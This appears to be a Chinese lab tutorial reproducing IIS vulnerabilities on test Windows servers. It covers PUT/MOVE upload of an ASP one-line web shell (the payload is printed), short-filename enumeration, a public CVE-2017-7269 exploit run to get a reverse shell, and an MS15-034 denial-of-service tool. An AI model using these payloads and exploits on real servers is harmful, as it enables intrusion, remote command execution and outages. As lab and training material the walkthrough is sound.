IIS漏洞再现

一、IIS任意文件上传漏洞

1、安装Windows2003

2、设置

3、浏览访问Windows2003的IP

访问成功

4、抓包,上传木马

注意里面的PUT和MOVE都必须是大写

在当前页抓包用PUT方式上传一个1.txt文件,内容是木马

<%eval request("cmd")%>

可以看到201上传成功

接下来把1.txt的内容移动到IP下的1.asp

访问木马

成功访问到

5、用蚁剑测试连接

二、IIS短文件漏洞

1、原理

当后缀小于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位

当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名

2、特征

(1)只显示前6位的字符,后续字符用~1代替。其中数字1是可以递增。如果存在文件名类似的文件,则前面的 6个字符是相同的,后面的数字进行递增

(2)后缀名最长只有3位,超过3位的会生成短文件名,且后缀多余的部分会截断。

(3)所有小写字母都会转换成大写字母

(4)长文件名中包含多个"."的时候,以文件最后一个"."作为短文件名的后缀

(5)长文件名前缀/文件夹名字符长度符合0-9和A-Z、a-z范围且需要大于等于9位才会生成短文件名,如果包含空格或者其他部分特殊字符,不论长度均会生成短文件。

3、验证

在win2003的网站目录下新建一个长文件名abcdefghijk.txt,内容写上123

在本机浏览器测试我们刚刚创建的文件,如果是404,则说明存在此短文件名

首先*~1*肯定存在,因为*代表任意位数的字符,在这里表示前六位字符

当我们访问*a~1*时,没返回404,说明不存在这个短文件,因为我们的文件名设置的是abcdefghijk.txt,第一个字符是a

当我们访问a*~1*时,返回404,说明存在,而这也和我们创建的文件名相对应

以此类推就能推测出短文件名

短文件漏洞就是这样用的

三、IIS RCE-CVE-2017-7269

1、在kali上传一个工具

地址:GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269

2、运行工具

用python2运行

python2 文件的绝对路径 要攻击的地址 端口 反弹到哪里的地址 端口

3、再开一个终端,监听我们刚刚开的端口

4、反弹shell成功

5、执行命令

四、HTTP.SYS远程代码执执漏洞

1、打开Windows server2012

2、访问IP

3、下载工具

在kali下载工具,地址:https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

4、使用工具

cd 进入工具

运行工具

接下来工具要什么我们给什么

第一个是要攻击目标的IP

第二个是要端口

第三个是要攻击目标的路径里有的文件

而我们攻击的目标只能访问到一个图片,不知道他的路径,那么就在网页上点鼠标右键,复制图像链接,粘贴出来就可以看到了

继续运行

返回Windows2012看一下

刚刚已经把我的Windows2012打关机了,这是自动开机以后得状态

5、这样就成功了

相关推荐
神梦流7 小时前
GE 引擎的非标准数据流处理:稀疏张量与自定义算子在图优化中的语义保持
linux·运维·服务器
兜兜转转了多少年7 小时前
从脚本到系统:2026 年 AI 代理驱动的 Shell 自动化
运维·人工智能·自动化
Lsir10110_8 小时前
【Linux】中断 —— 操作系统的运行基石
linux·运维·嵌入式硬件
郝学胜-神的一滴8 小时前
深入浅出:使用Linux系统函数构建高性能TCP服务器
linux·服务器·开发语言·网络·c++·tcp/ip·程序人生
Doro再努力8 小时前
【Linux操作系统12】Git版本控制与GDB调试:从入门到实践
linux·运维·服务器·git·vim
全栈工程师修炼指南8 小时前
Nginx | stream content 阶段:UDP 协议四层反向代理浅析与实践
运维·网络·网络协议·nginx·udp
Lsir10110_9 小时前
【Linux】进程信号(上半)
linux·运维·服务器
开开心心就好9 小时前
发票合并打印工具,多页布局设置实时预览
linux·运维·服务器·windows·pdf·harmonyos·1024程序员节
火车叼位9 小时前
脚本伪装:让 Python 与 Node.js 像原生 Shell 命令一样运行
运维·javascript·python
css趣多多10 小时前
add组件增删改的表单处理
java·服务器·前端